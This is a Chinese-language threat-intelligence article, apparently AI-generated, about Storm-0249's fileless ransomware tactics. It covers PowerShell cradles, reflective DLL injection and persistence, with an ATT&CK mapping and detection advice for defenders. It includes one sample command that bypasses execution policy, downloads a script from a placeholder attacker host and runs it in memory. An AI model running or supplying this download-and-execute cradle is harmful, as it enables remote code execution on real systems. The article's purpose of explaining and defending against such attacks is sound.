前言:看不見的敵人最致命
隨著 EDR(端點偵測與回應)的普及,勒索軟體駭客也開始進化。微軟威脅情報中心追蹤代號為 Storm-0249 的攻擊叢集,近期被發現採用高度複雜的**「無檔案(Fileless)」**戰術。
不同於傳統勒索軟體會將 .exe 檔案落地到硬碟,Storm-0249 幾乎全程在記憶體(RAM)中運作。攻擊者利用 Windows 內建的 PowerShell 作為武器,將加密模組直接注入系統進程,這讓依賴「檔案掃描」的傳統防毒軟體完全失效。
技術解構:從 PowerShell 到記憶體注入
Storm-0249 的攻擊流程展現了對 Windows API 與系統工具的深刻理解,主要分為三個階段:
1. 初始存取與無檔案下載
攻擊者通常利用 Web 伺服器漏洞或 RDP 暴力破解進入系統後,立即執行 PowerShell 下載腳本(Cradle)。
關鍵技術: 使用 Invoke-Expression (IEX) 結合 Invoke-WebRequest,將遠端惡意腳本直接載入記憶體執行,完全不寫入硬碟。
# 攻擊腳本示意 (De-obfuscated)
powershell -NoProfile -ExecutionPolicy Bypass -Command "& {
$payload = iwr 'https://attacker-site.com/loader.ps1' -UseBasicParsing;
Invoke-Expression $payload.Content
}"2. 反射式 DLL 注入 (Reflective DLL Loading)
這是 Storm-0249 最核心的技術。傳統 LoadLibrary API 需要 DLL 檔案存在於硬碟上,但反射式載入允許駭客將 DLL 轉為 Base64 字串或二進位流,直接在記憶體中「手動」加載。
- 運作原理:
- 記憶體分配: 腳本利用
System.Runtime.InteropServices.Marshal或VirtualAlloc在記憶體中開闢一段可執行空間(RWX)。 - 寫入 Payload: 將解碼後的惡意 DLL 二進位資料寫入該空間。
- 執行掛鉤: 透過
CreateRemoteThread或委派(Delegate)方式,將執行權轉移給記憶體中的 DLL 入口點。
- 記憶體分配: 腳本利用
技術修正註記: 真正的反射式載入不會呼叫
kernel32::LoadLibrary指向記憶體指標(這會導致崩潰),而是透過模擬 Windows Loader 的行為,自行修復記憶體位址與導入表(IAT)。
3. 持續性與加密
雖然主要攻擊在記憶體中,但為了確保重開機後仍能運作,攻擊者會利用 WMI Event Subscriptions 或 排程任務 來埋藏啟動指令。一旦環境就緒,注入的 DLL 便會呼叫加密 API,鎖死使用者的檔案。
MITRE ATT&CK 戰術對應
資安團隊可參考以下指標進行威脅獵捕(Threat Hunting):
| ID | 戰術/技術 | 說明 |
| T1059.001 | Command and Scripting Interpreter: PowerShell | 利用 PowerShell 下載並執行 Payload。 |
| T1055.001 | Process Injection: Dynamic-link Library Injection | 利用反射式加載技術將惡意 DLL 注入進程。 |
| T1053.005 | Scheduled Task/Job | 建立排程任務以維持系統重啟後的存取權。 |
| T1027 | Obfuscated Files or Information | 對 PowerShell 腳本與 DLL 內容進行 Base64 或 XOR 編碼。 |
企業防禦與偵測建議
面對 Storm-0249 這類無檔案攻擊,單靠特徵碼掃描已不足夠,企業需轉向「行為監控」:
1. 強化 PowerShell 管控
- 啟用 Script Block Logging (Event ID 4104): 這能記錄 PowerShell 實際執行的解碼後內容,讓 Base64 混淆無所遁形。
- 限制執行策略: 將 ExecutionPolicy 設定為
AllSigned,僅允許受信任簽章的腳本執行(雖可繞過,但增加了攻擊門檻)。 - Constrained Language Mode: 在一般使用者環境強制啟用受限語言模式,限制對 .NET API 的呼叫。
2. 記憶體掃描與 EDR
- 部屬具備 AMSI (Antimalware Scan Interface) 整合的防護軟體,它能在腳本送入記憶體執行前進行掃描。
- 監控異常的 API 呼叫:如非系統進程頻繁呼叫
VirtualAlloc、WriteProcessMemory與CreateRemoteThread。
3. 最小權限原則
- 限制一般使用者對
Registry與Task Scheduler的寫入權限,阻斷攻擊者建立持續性後門的路徑。
結語
Storm-0249 的案例警示我們,勒索軟體已不再只是「加密檔案」的病毒,而是具備 APT 等級技術的精準攻擊。唯有提升對記憶體鑑識與腳本行為分析的能力,才能在這場無形的攻防戰中守住防線。
參考資料
- Microsoft Threat Intelligence: Storm Clusters
- MITRE ATT&CK: Reflective Code Loading
- 註:本文代碼僅供資安研究與教育用途,請勿用於非法測試。
🧠 本文由 DreamJ AI 技術新聞生成系統 自動撰寫與優化,
內容僅供技術研究與學習參考,實際環境請搭配官方公告與資安建議。
發佈留言